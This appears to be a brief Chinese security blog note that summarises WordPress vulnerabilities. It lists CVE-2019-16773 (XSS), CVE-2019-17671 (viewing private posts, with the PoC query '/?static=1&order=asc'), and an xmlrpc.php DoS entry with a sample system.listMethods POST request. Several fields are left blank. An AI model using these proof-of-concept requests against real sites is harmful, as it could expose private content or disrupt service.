应用安全 - 框架 - PHPCMS - Wordpress - 漏洞 - 汇总

简介

后台：
/wp-login.php

CVE-2019-16773

Date
2019.3

类型
XSS

影响范围
WordPress 3.7版本至5.3.0版本

前置条件
（1）登录/wp-login.php

CVE-2019-17671

Date
2019

类型
越权

影响范围
WordPress <= 5.2.3

前置条件
（1）有搜索功能
（2）有私密页面（不允许非管理员用户访问）

复现
poc | EXP
/?static=1&order=asc

CVE-2014-8877

Date
2014

类型


影响范围

xmlrpc.php

Date

类型
DOS

影响范围

复现
POC
POST /xmlrpc.php
<?xml version="1.0" encoding="utf-8"?>
<methodCall>
<methodName>system.listMethods</methodName>
<params></params>
</methodCall>

posted @ 2020-01-08 17:42 7hang 阅读(335) 评论(0) 编辑收藏举报

会员力量，点亮园子希望

刷新页面返回顶部

7hang.

网络安全爱好者，blog is just for notes.

应用安全 - 框架 - PHPCMS - Wordpress - 漏洞 - 汇总

公告